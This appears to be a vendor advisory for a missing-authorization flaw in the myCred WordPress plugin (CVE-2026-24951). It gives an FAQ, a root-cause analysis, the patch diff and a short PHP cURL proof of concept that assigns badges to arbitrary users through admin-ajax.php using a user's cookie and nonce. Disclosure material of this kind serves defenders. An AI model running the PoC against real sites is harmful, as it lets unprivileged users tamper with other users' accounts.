What is CVE-2026-24951?

CVE-2026-24951 is a medium severity vulnerability in the myCred plugin for WordPress, specifically versions 2.9.7.3 and earlier. It is caused by a missing authorization check, allowing authenticated users with Subscriber-level access and above to perform unauthorized actions related to badge management.

How does this vulnerability work?

The vulnerability arises from the absence of capability checks in the mycred_revoke_user_badge() and mycred_assign_user_badge() functions. Authenticated attackers can send crafted POST requests to the admin-ajax.php endpoint to assign or revoke badges without proper permissions.

Who is affected by this vulnerability?

Any WordPress site using myCred plugin version 2.9.7.3 or earlier is affected. This includes sites where users have Subscriber-level access or higher, potentially allowing them to exploit the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the myCred plugin installed. If it is 2.9.7.3 or earlier, your site is at risk. Additionally, review your user roles to see if any authenticated users have Subscriber-level access or higher.

How can I fix this vulnerability?

The vulnerability is patched in version 2.9.7.4 of the myCred plugin. Updating to this version will implement the necessary capability checks and mitigate the risk associated with this vulnerability.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity level. This means that while the vulnerability does not allow for full system compromise, it enables unauthorized actions that can undermine the integrity of the badge management system.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to unauthorized badge assignments or revocations, affecting user reputation and the integrity of gamification systems. This could be used for harassment or manipulation of achievement-based access controls.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how an authenticated user can send a crafted request to assign a badge to another user without proper authorization.

How does the PoC exploit the vulnerability?

The PoC uses valid WordPress authentication cookies and a nonce to craft a POST request targeting the vulnerable AJAX actions. By manipulating the parameters, an attacker can assign badges to any user, demonstrating the lack of authorization checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider temporarily disabling the myCred plugin or restricting access to the WordPress admin area for lower-privileged users. Monitor user activity closely for any unauthorized actions related to badge management.

Are there any additional security measures I should implement?

In addition to updating plugins, ensure that all user roles are appropriately assigned, implement strong password policies, and regularly audit user permissions. Consider using security plugins that can help monitor and restrict unauthorized access.

Where can I find more information about this vulnerability?

More information about CVE-2026-24951 can be found in the official CVE database, security advisories from the myCred developers, and security-focused blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24951: myCred <= 2.9.7.3 – Missing Authorization (mycred)

CVE ID CVE-2026-24951

Plugin mycred

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.9.7.3

Patched Version 2.9.7.4

Disclosed February 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24951:
The myCred WordPress plugin version 2.9.7.3 and earlier contains a missing authorization vulnerability in its badge management module. This flaw allows authenticated attackers with Subscriber-level permissions or higher to perform unauthorized badge assignment and revocation actions, bypassing intended administrative controls. The CVSS 4.3 score reflects the moderate impact of this privilege escalation vulnerability.

The root cause is the absence of capability checks in the mycred_revoke_user_badge() and mycred_assign_user_badge() functions within the badge-plus module. In the vulnerable code at mycred/addons/badge-plus/includes/badge-plus-module-class.php lines 973-1018, both functions verify nonces but lack any authorization validation. The functions process POST parameters ‘postid’, ‘user_id’, and ‘earned’ without confirming the requesting user has administrative privileges. This missing check violates WordPress security best practices by allowing low-privileged users to access badge management functionality.

Exploitation requires an authenticated attacker with any WordPress user role to send crafted POST requests to the WordPress admin-ajax.php endpoint. The attacker must target the AJAX actions ‘mycred_revoke_user_badge’ and ‘mycred_assign_user_badge’ with valid nonce values. Nonce values are accessible to authenticated users through the plugin’s localized scripts. The payload includes parameters ‘postid’ (badge ID), ‘user_id’ (target user ID), and ‘earned’ (badge instance ID for revocation). Attackers can manipulate these parameters to arbitrarily assign or revoke badges for any user.

The patch adds capability checks using the mycred_is_admin() function in both vulnerable functions. In the patched version at lines 839-840 and 1030-1031, the code now returns a ‘Permission denied’ JSON error with HTTP 403 status when non-admin users attempt to call these functions. The patch also fixes nonce verification logic in the save_badge_plus() function at line 673 and adds proper nonce generation in the badge_plus_user_screen() function at line 830. These changes ensure only administrators can perform badge management operations while maintaining proper nonce validation throughout.

Successful exploitation allows attackers to manipulate the badge system, potentially affecting user reputation, gamification mechanics, and loyalty program integrity. Attackers can assign themselves or other users badges they haven’t earned, or revoke legitimately earned badges from targeted users. While this doesn’t directly compromise the WordPress installation, it undermines the plugin’s gamification system and could be used for harassment, reputation manipulation, or circumventing achievement-based access controls.

Differential between vulnerable and patched code

Code Diff

--- a/mycred/addons/badge-plus/includes/badge-plus-module-class.php
+++ b/mycred/addons/badge-plus/includes/badge-plus-module-class.php
@@ -450,7 +450,8 @@
             array(
                 'requirement_template' => $mycred_badge_requirement_template,
                 'event_templates' => $badge_event_templates,
-                'post_id' => get_the_ID()
+                'post_id' => get_the_ID(),
+                'nonce'   => wp_create_nonce( 'mycred-badge-plus-nonce' )
             )
         );
     }
@@ -670,7 +671,7 @@

         if ( ! empty( $type[0]->term_id ) ) {

-            if( ! isset( $_POST['mycred-badgeplus-nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['mycred-badgeplus-nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            if( isset( $_POST['mycred-badgeplus-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['mycred-badgeplus-nonce'] ) ), 'mycredbadgeplus-nonce' ) ) {
                 $amount = isset( $_POST['mycred_points_badge_plus'] ) ? intval( $_POST['mycred_points_badge_plus'] ) : 0;
                 mycred_update_post_meta( $post_id , 'mycred_points_badge_plus', $amount );

@@ -826,6 +827,13 @@
     public function badge_plus_user_screen( $user ) {

         wp_enqueue_script( 'mycred-badge-plus-admin' );
+        wp_localize_script(
+            'mycred-badge-plus-admin',
+            'mycred_badge_plus_localize_data',
+            array(
+                'nonce' => wp_create_nonce( 'mycred-badge-plus-nonce' )
+            )
+        );
         $user_id    = $user->ID;
         $earned     = mycred_get_user_meta( $user_id, 'mycred_badge_plus_ids', '', true );

@@ -973,25 +981,31 @@
     /**
      * revoke user badge
      * @since 2.5
-     * @version 1.0
+     * @version 1.1
      */
     public function mycred_revoke_user_badge() {

-        if( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
-            $badge_id           = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
-            $user_id            = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
-            $earned             = isset( $_POST['earned'] ) ? absint( $_POST['earned'] ) : 0;
-            $users_badges       = mycred_get_users_earned_badge_plus( $user_id );
-
-            if( in_array( $earned, $users_badges ) ) {
+        if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
+        }

-                $badge = mycred_badge_plus_object($badge_id);
-                $badge->divest( $user_id, $earned );
-                $msg = 'removed';
-            }else{
-                $msg = 'no badge';
-            }
+        if ( ! mycred_is_admin() ) {
+            wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
+        }
+
+        $badge_id     = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
+        $user_id      = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
+        $earned       = isset( $_POST['earned'] ) ? absint( $_POST['earned'] ) : 0;
+        $users_badges = mycred_get_users_earned_badge_plus( $user_id );
+
+        if ( in_array( $earned, $users_badges ) ) {
+
+            $badge = mycred_badge_plus_object($badge_id);
+            $badge->divest( $user_id, $earned );
+            $msg = 'removed';

+        } else {
+            $msg = 'no badge';
         }

         wp_send_json( array(
@@ -1004,44 +1018,55 @@
     /**
      * assign user badge
      * @since 2.5
-     * @version 1.0
+     * @version 1.1
      */
     public function mycred_assign_user_badge() {

         // Verify nonce
         if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
+        }

-            // Extract data
-            $badge_id = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
-            $user_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
-
-            if ( ! $badge_id || ! $user_id ) {
-                wp_send_json_error( array( 'message' => 'Missing badge or user information.' ), 400 );
-            }
+        if ( ! mycred_is_admin() ) {
+            wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
+        }

-            // Get badge object
-            $badge = mycred_badge_plus_object( $badge_id );
+        // Extract data
+        $badge_id = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
+        $user_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;

-            if ( ! $badge ) {
-                wp_send_json_error( array( 'message' => 'Invalid badge.' ), 404 );
-            }
+        if ( ! $badge_id || ! $user_id ) {
+            wp_send_json_error( array( 'message' => 'Missing badge or user information.' ), 400 );
+        }

-            // Assign badge
-            $title  = $badge->title;
-            $amount = $badge->points_award;
-            $date   = wp_date( 'F d Y h:i A', time() );
-            $msg    = 'assign';
-
-            // Handle reassignment
-            if ( $badge->user_has_badge( $user_id, $badge_id ) ) {
-                return;
-
-            }
+        // Get badge object
+        $badge = mycred_badge_plus_object( $badge_id );

-            $badge->assign( $user_id, $badge_id );
+        if ( ! $badge ) {
+            wp_send_json_error( array( 'message' => 'Invalid badge.' ), 404 );
+        }

+        // Assign badge
+        $title  = $badge->title;
+        $amount = $badge->points_award;
+        $date   = wp_date( 'F d Y h:i A', time() );
+        $msg    = 'assign';
+
+        // Handle reassignment
+        if ( $badge->user_has_badge( $user_id, $badge_id ) ) {
+            wp_send_json_success( array(
+                'badge_id' => $badge_id,
+                'user_id'  => $user_id,
+                'earned'   => time(),
+                'title'    => $title,
+                'amount'   => $amount,
+                'date'     => $date,
+                'assign'   => 'already has badge'
+            ), 200 );
         }

+        $badge->assign( $user_id, $badge_id );
+
         // Return success response
         wp_send_json_success( array(
             'badge_id' => $badge_id,
--- a/mycred/addons/coupons/includes/mycred-coupon-shortcodes.php
+++ b/mycred/addons/coupons/includes/mycred-coupon-shortcodes.php
@@ -50,7 +50,7 @@

 					$message = mycred_get_coupon_error_message( $load, $coupon );
 					$message = $mycred->template_tags_general( $message );
-					$output .= '<div class="alert alert-danger">' . $message . '</div>';
+					$output .= '<div class="alert alert-danger">' . wp_kses_post( $message ) . '</div>';

 				}

@@ -80,8 +80,10 @@

 		}

-		if ( $label != '' )
+		if ( $label != '' ) {
+			$label = wp_kses_post( $label );
 			$label = '<label for="mycred-coupon-code">' . $label . '</label>';
+		}

 		$output .= '
 	<form action="" method="post" class="form-inline">
--- a/mycred/mycred.php
+++ b/mycred/mycred.php
@@ -3,7 +3,7 @@
  * Plugin Name: myCred
  * Plugin URI: https://mycred.me
  * Description: An adaptive points management system for WordPress powered websites.
- * Version: 2.9.7.3
+ * Version: 2.9.7.4
  * Tags: point, credit, loyalty program, engagement, reward, woocommerce rewards
  * Author: myCred
  * Author URI: https://mycred.me
@@ -20,7 +20,7 @@
 	final class myCRED_Core {

 		// Plugin Version
-		public $version             = '2.9.7.3';
+		public $version             = '2.9.7.4';

 		// Instnace
 		protected static $_instance = NULL;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24951 - myCred <= 2.9.7.3 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-24951
 * Demonstrates unauthorized badge assignment in myCred plugin
 * Requires valid WordPress authentication cookies and nonce
 */

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$cookie = 'wordpress_logged_in_abc=...'; // Valid auth cookie
$nonce = 'valid_nonce_value'; // Obtain from page source or other endpoints

// Craft unauthorized badge assignment request
$post_data = array(
    'action' => 'mycred_assign_user_badge',
    'nonce' => $nonce,
    'postid' => 123, // Target badge ID
    'user_id' => 456 // Target user ID
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Cookie: ' . $cookie,
    'Content-Type: application/x-www-form-urlencoded'
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsen";

// Check for success indicators
if (strpos($response, '"success":true') !== false) {
    echo "[+] Badge assignment successfuln";
} elseif (strpos($response, 'Permission denied') !== false) {
    echo "[-] Target appears patchedn";
} else {
    echo "[?] Unexpected responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-24951?
Overview of the vulnerability
CVE-2026-24951 is a medium severity vulnerability in the myCred plugin for WordPress, specifically versions 2.9.7.3 and earlier. It is caused by a missing authorization check, allowing authenticated users with Subscriber-level access and above to perform unauthorized actions related to badge management.
How does this vulnerability work?
Mechanics of the exploit
The vulnerability arises from the absence of capability checks in the mycred_revoke_user_badge() and mycred_assign_user_badge() functions. Authenticated attackers can send crafted POST requests to the admin-ajax.php endpoint to assign or revoke badges without proper permissions.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using myCred plugin version 2.9.7.3 or earlier is affected. This includes sites where users have Subscriber-level access or higher, potentially allowing them to exploit the vulnerability.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the myCred plugin installed. If it is 2.9.7.3 or earlier, your site is at risk. Additionally, review your user roles to see if any authenticated users have Subscriber-level access or higher.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.9.7.4 of the myCred plugin. Updating to this version will implement the necessary capability checks and mitigate the risk associated with this vulnerability.
What does the CVSS score of 4.3 indicate?
Understanding severity levels
The CVSS score of 4.3 indicates a medium severity level. This means that while the vulnerability does not allow for full system compromise, it enables unauthorized actions that can undermine the integrity of the badge management system.
What are the practical risks associated with this vulnerability?
Potential impacts on site security
Exploitation of this vulnerability can lead to unauthorized badge assignments or revocations, affecting user reputation and the integrity of gamification systems. This could be used for harassment or manipulation of achievement-based access controls.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how an authenticated user can send a crafted request to assign a badge to another user without proper authorization.
How does the PoC exploit the vulnerability?
Technical details of the PoC
The PoC uses valid WordPress authentication cookies and a nonce to craft a POST request targeting the vulnerable AJAX actions. By manipulating the parameters, an attacker can assign badges to any user, demonstrating the lack of authorization checks.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider temporarily disabling the myCred plugin or restricting access to the WordPress admin area for lower-privileged users. Monitor user activity closely for any unauthorized actions related to badge management.
Are there any additional security measures I should implement?
Best practices for WordPress security
In addition to updating plugins, ensure that all user roles are appropriately assigned, implement strong password policies, and regularly audit user permissions. Consider using security plugins that can help monitor and restrict unauthorized access.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-24951 can be found in the official CVE database, security advisories from the myCred developers, and security-focused blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations